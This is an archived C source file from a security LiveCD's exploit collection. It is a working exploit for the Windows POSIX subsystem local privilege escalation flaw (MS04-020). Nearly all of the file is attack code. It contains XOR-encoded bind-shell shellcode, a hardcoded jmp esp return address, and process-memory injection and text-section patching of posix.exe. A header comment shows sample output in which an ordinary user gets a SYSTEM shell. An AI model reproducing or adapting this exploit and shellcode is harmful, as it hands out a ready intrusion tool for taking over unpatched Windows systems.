home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / posixexp.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  11KB  |  351 lines

  1. /* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
  2. *
  3. * Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
  4. *
  5. * Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
  6. *
  7. * 2004/07/16 
  8. *
  9. * thanks to eyas xfocus org
  10. *
  11. *
  12. C:\>whoami
  13. VITUALWIN2K\test
  14.  
  15. C:\>posixexp
  16. Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
  17. By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
  18.  
  19. pax: illegal option--h
  20. Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
  21. pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
  22. pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
  23. [-t device] [-x format] [pathname...]
  24. pax -r -w [-ilmopuvy] [-s replstr] [pathname...] directory
  25.  
  26. For more information on pax syntax, see Command Reference
  27. Help in the Windows Help file.Remote addr:0x7ff90000
  28. Microsoft Windows 2000 [Version 5.00.2195]
  29. (C) ???? 1985-2000 Microsoft Corp.
  30.  
  31. C:\WINNT\system32>whoami
  32. whoami
  33. NT AUTHORITY\SYSTEM
  34.  
  35. C:\WINNT\system32>exit
  36. [+] Connection closed in exit command.
  37.  
  38. C:\>
  39.  
  40. */
  41.  
  42. #include <stdlib.h>
  43. #include <Winsock2.h>
  44. #include <windows.h>
  45.  
  46. #pragma comment(lib,"ws2_32")
  47.  
  48. #define PATCHADDR 0x0100343D        //??????posix.exe???
  49. #define MEMSIZE 0x350
  50. #define CODESIZE 50
  51. #define bind_port_offset 116
  52. #define RETADDR  0x7c2ec663 //advapi32.dll jmp esp
  53. // [ebp-0x200] [saved ebp] [saved eip] 
  54. #define EIPLOCATION 0x200+4-12    //12?"\DosDevices\"???
  55. #define CANWRITEADDR 0x7ffdf02c     //???+0x20???
  56. #define VERSION "1.0"
  57.  
  58. unsigned short bindport = 60000;
  59.  
  60. unsigned char jmpcode[]=
  61. "\x33\xC0"        //xor eax,eax
  62. "\x66\xB8\xc0\x01"    //mov ax,0x1ff
  63. "\x40"            //inc eax
  64. "\x2B\xE0"        //sub esp,eax
  65. "\xFF\xE4"        //jmp esp
  66. "\x00";            //\0 zero NULL 
  67.    
  68. unsigned char bind_shell[]=
  69. "\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x45\x01\x80\x34\x0b\xee\xe2\xfa"
  70. "\xeb\x05\xe8\xeb\xff\xff\xff"
  71. /* 302 bytes shellcode, xor with 0xee */
  72. "\x07\x12\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
  73. "\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x72\xee\xee\xee"
  74. "\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
  75. "\x84\xe8\xb7\x06\x6a\xee\xee\xee\x0c\x17\x65\x2a\xdd\x27\xdd\x3c"
  76. "\x5f\xea\x19\x1f\xc5\x0c\x6f\x02\x7e\xef\xee\xee\x65\x22\xbf\x86"
  77. "\xec\xec\xee\xee\x11\xb8\xca\xdd\x27\xbf\x86\xec\xee\xee\xdb\x65"
  78. "\x02\xbf\xbf\xbf\xbf\x84\xef\x84\xec\x11\xb8\xfe\x7d\x84\xfe\xbb"
  79. "\xbd\x11\xb8\xfa\xbe\xbd\x11\xb8\xf6\x65\x12\x84\xe0\xb7\x45\x0c"
  80. "\x13\xbe\xbe\xbd\x11\xb8\xf2\x88\x29\xaa\xca\xc2\xef\xef\x45\x45"
  81. "\x45\x65\x3a\x86\x8d\x83\x8a\xee\x65\x02\xdd\x27\xbe\xb9\xbc\xbf"
  82. "\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
  83. "\xb8\xe2\xbd\x11\xb8\xce\x11\xb8\xce\x11\xb8\xe6\xbf\xb8\x65\x9b"
  84. "\xd2\x65\x9a\xc0\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7"
  85. "\xaf\x43\xed\x2b\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3"
  86. "\xed\x34\xae\x05\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88"
  87. "\x65\xe2\xa5\x65\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7"
  88. "\x2d\x06\x11\x10\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20"
  89. "\x0e\x8e\x43\x37\xeb\x20\x37\xe7\x1b\x43\x4a\xf4\x9e\x29\x4a\x43"
  90. "\xc0\x07\x0b\xa7\x68\xa7\x09\x97\x28\x97\x25\x03\x12\xd5"
  91. ;
  92.  
  93. int readwrite(SOCKET fd);
  94. int client_connect(int sockfd,char* server,int port);
  95.  
  96. main()
  97. {
  98.    STARTUPINFO si;
  99.    PROCESS_INFORMATION pi;
  100.    LPVOID pdwCodeRemote;
  101.    unsigned int cbMemSize = MEMSIZE;
  102.    DWORD dwOldProtect,dwNumBytesXferred;
  103.    unsigned char buffer[MEMSIZE];
  104.    unsigned int buflen=0;
  105.    unsigned char textbuf[CODESIZE];
  106.    int i;
  107.    unsigned short lports;
  108.    char cmdarg[400];
  109.    char systemdir[MAX_PATH+1];
  110.    WSADATA    wsd;
  111.    SOCKET sockfd;
  112.    
  113.    printf("Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(%s)\n",VERSION);
  114.    printf("By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com\n\n");
  115.    if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
  116.    {
  117.        printf("[-] WSAStartup error:%d\n", WSAGetLastError());
  118.        return -1;
  119.    }
  120.    
  121.    i = GetWindowsDirectory(systemdir,MAX_PATH);
  122.    systemdir[i]='\0';
  123.    _snprintf(cmdarg,sizeof(cmdarg)-1,"%s\\system32\\posix.exe /P %s\\system32\\pax.exe /C pax -h",systemdir,systemdir);
  124.    //printf("cmdarg:%s\n",cmdarg);
  125.    //exit(0);
  126.    ZeroMemory(&si,sizeof(si));
  127.    si.cb = sizeof(si);
  128.    ZeroMemory( &pi,sizeof(pi));
  129.    //create process
  130.    //??psxss????
  131.    if(!CreateProcess(NULL, cmdarg, NULL, NULL, TRUE, 0, 0, 0, &si, &pi))
  132.    {
  133.     printf("CreateProcess1 failed:%d\n", GetLastError());
  134.     return 0;
  135.    }
  136.    WaitForSingleObject(pi.hProcess, INFINITE);
  137.    //?????
  138.    ZeroMemory(&si,sizeof(si));
  139.    si.cb = sizeof(si);
  140.    ZeroMemory( &pi,sizeof(pi));
  141.    if(!CreateProcess(NULL, cmdarg, NULL, NULL, TRUE,CREATE_SUSPENDED, 0, 0, &si, &pi))
  142.    {
  143.     printf("CreateProcess2 failed:%d\n", GetLastError());
  144.     return 0;
  145.    }
  146.    //alloc from remote process
  147.    pdwCodeRemote = (PDWORD)VirtualAllocEx(pi.hProcess, NULL, cbMemSize,MEM_COMMIT | 
  148.    MEM_TOP_DOWN,PAGE_EXECUTE_READWRITE);
  149.    if (pdwCodeRemote == NULL) 
  150.    {
  151.        TerminateProcess(pi.hProcess,0);
  152.        printf("VirtualAllocEx failed:%d\n",GetLastError());
  153.        return 0;
  154.    }
  155.    printf("Remote addr:0x%08x\n",pdwCodeRemote);
  156.    //we can write and execute
  157.    if(!VirtualProtectEx(pi.hProcess, pdwCodeRemote, cbMemSize,PAGE_EXECUTE_READWRITE, &dwOldProtect)) 
  158.    {
  159.        TerminateProcess(pi.hProcess,0);
  160.        printf("VirtualProtectEx failed:%d\n",GetLastError());
  161.        return 0;
  162.    }
  163.    //make shellcode    
  164.    lports = htons(bindport)^0xeeee;
  165.    memcpy(bind_shell+bind_port_offset,&lports,2);
  166.    
  167.    memset(buffer,'\x90',MEMSIZE);
  168.    //memset(buffer,'A',EIPLOCATION);
  169.    buffer[MEMSIZE-1] = '\0';
  170.    i=sizeof(bind_shell)-1;
  171.    if(i >= EIPLOCATION) 
  172.    {
  173.        printf("shellcode so large:%d,must < %d\n",i,MEMSIZE);
  174.        TerminateProcess(pi.hProcess,0);
  175.        return 0;
  176.    }
  177.    i=EIPLOCATION-i;
  178.    memcpy(buffer+i,bind_shell,sizeof(bind_shell)-1);
  179.    *(unsigned int*)(buffer+EIPLOCATION) = RETADDR; //??eip
  180.    *(unsigned int*)(buffer+EIPLOCATION+4) =CANWRITEADDR; //???????
  181.    memcpy(buffer+EIPLOCATION+12,jmpcode,sizeof(jmpcode)-1);
  182.    //write in to target
  183.    buflen=MEMSIZE;
  184.    if(!WriteProcessMemory(pi.hProcess,pdwCodeRemote,buffer,buflen,&dwNumBytesXferred)) 
  185.    {
  186.        TerminateProcess(pi.hProcess,0);
  187.        printf("WriteProcessMemory failed:%d\n",GetLastError());
  188.        return 0;
  189.    }
  190.    //modified the process .text
  191.    if(!VirtualProtectEx(pi.hProcess,(LPVOID)PATCHADDR,CODESIZE,PAGE_EXECUTE_READWRITE, &dwOldProtect)) 
  192.    {
  193.        TerminateProcess(pi.hProcess,0);
  194.        printf("VirtualProtectEx 0x08x failed:%d\n",PATCHADDR,GetLastError());
  195.        return 0;
  196.    }
  197.    //????????
  198.    i = 0;
  199.    textbuf[i++]='\xbf';
  200.    textbuf[i++]=(DWORD)pdwCodeRemote & 0xff;    //mov edi,pdwCodeRemote
  201.    textbuf[i++]=((DWORD)pdwCodeRemote >> 8 ) & 0xff;
  202.    textbuf[i++]=((DWORD)pdwCodeRemote >> 16 ) & 0xff;
  203.    textbuf[i++]=((DWORD)pdwCodeRemote >> 24 ) & 0xff;
  204.    //??????
  205.    textbuf[i++]='\xeb';
  206.    textbuf[i++]='\x09'; //jmp .+0b
  207.    //?????
  208.    if(!WriteProcessMemory(pi.hProcess,(LPVOID)PATCHADDR,textbuf,i,&dwNumBytesXferred)) 
  209.    {
  210.        TerminateProcess(pi.hProcess,0);
  211.        printf("WriteProcessMemory failed:%d\n",GetLastError());
  212.        return 0;
  213.    }
  214.    ResumeThread(pi.hThread);
  215.    Sleep(5);
  216.    sockfd=WSASocket(2,1,0,0,0,0);
  217.    if(sockfd == INVALID_SOCKET)
  218.    {
  219.        printf("[-] WSASocket error:%d\n", WSAGetLastError());
  220.        return -1;
  221.    }
  222.    if(client_connect(sockfd,"127.0.0.1",bindport) < 0)
  223.    {
  224.        closesocket(sockfd);
  225.        printf("[-] Maybe not success?\n");
  226.    }
  227.    readwrite(sockfd);
  228.    TerminateProcess(pi.hProcess,0);
  229.    WaitForSingleObject(pi.hProcess, INFINITE);
  230. }
  231.  
  232. int readwrite(SOCKET fd)
  233. {
  234.    fd_set fdr1;
  235.    unsigned char buffer[1024];
  236.    int istty,ct1,ct2;
  237.    struct timeval timer;
  238.  
  239.    memset(buffer,0,sizeof(buffer));
  240.    istty=_isatty(0);
  241.    timer.tv_sec=0;
  242.    timer.tv_usec=0;
  243.  
  244.    while(1)
  245.    {
  246.  
  247.        FD_ZERO(&fdr1);
  248.        FD_SET(fd,&fdr1);
  249.        ct1=select(0,&fdr1,NULL,NULL,&timer);
  250.        if(ct1==SOCKET_ERROR)
  251.        {
  252.            printf("[-] select error:%d\n",GetLastError());
  253.            break;
  254.        }
  255.        if(FD_ISSET(fd,&fdr1))
  256.        {
  257.            ct1=recv(fd,buffer,sizeof(buffer)-1,0);
  258.            if((ct1==SOCKET_ERROR) || (ct1==0))
  259.            {
  260.                printf("[-] target maybe close the socket.\n");
  261.                break;
  262.            }
  263.            if(_write(1,buffer,ct1)<=0)
  264.            {
  265.                printf("[-] write to stdout error:%d\n",GetLastError());
  266.                break;
  267.            }
  268.  
  269.            memset(buffer,0,sizeof(buffer));
  270.        }
  271.        if(istty)
  272.        {
  273.            if(_kbhit()) /* stdin can read */
  274.            {
  275.  
  276.  
  277.                ct1=read(0,buffer,sizeof(buffer)-1);
  278.                if(ct1 <= 0)
  279.                {
  280.                    printf("[-] read from stdin error:%d\n",GetLastError());
  281.                    break;
  282.                }
  283.                ct2=send(fd,buffer,ct1,0);
  284.                if((ct2==SOCKET_ERROR) || (ct2==0))
  285.                {
  286.                    printf("[-] target maybe close the socket.\n");
  287.                    break;
  288.                }
  289.                if( strnicmp(buffer, "exit", 4) == 0)
  290.                {
  291.                    printf("[+] Connection closed in exit command.\n");
  292.                    break;
  293.                }
  294.                memset(buffer,0,sizeof(buffer));
  295.            }
  296.        }
  297.        else
  298.        {
  299.            ct1=read(0,buffer,sizeof(buffer)-1);
  300.            if(ct1<=0)
  301.            {
  302.                printf("[-] read from nontty stdin error:%d\n",GetLastError());
  303.                break;
  304.            }
  305.            ct2=send(fd,buffer,ct1,0);
  306.            if((ct2==SOCKET_ERROR) || (ct2==0))
  307.            {
  308.                printf("[-] target maybe close the socket\n");
  309.                break;
  310.            }
  311.            if( strnicmp(buffer, "exit", 4) == 0)
  312.            {
  313.                printf("[+] Connection closed in exit command.\n");
  314.                break;
  315.            }
  316.            memset(buffer,0,sizeof(buffer));
  317.        }
  318.    }
  319.    return(1);
  320. }
  321.  
  322.  
  323. /* ????server ?port */
  324. int client_connect(int sockfd,char* server,int port)
  325. {
  326.    struct sockaddr_in cliaddr;
  327.    struct hostent *host;
  328.    short port2;
  329.  
  330.    port2=port & 0xffff;
  331.  
  332.    if((host=gethostbyname(server))==NULL)
  333.    {
  334.        printf("gethostbyname(%s) error\n",server);
  335.        return(-1);
  336.    }
  337.  
  338.    memset(&cliaddr,0,sizeof(struct sockaddr));
  339.    cliaddr.sin_family=AF_INET;
  340.    cliaddr.sin_port=htons(port2);
  341.    cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
  342.    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
  343.    {
  344.        printf("[-] Trying %s:%d error\n",server,port);
  345.        closesocket(sockfd);
  346.        return(-1);
  347.    }
  348.    //printf("ok\r\n");
  349.    return(0);
  350. }
  351.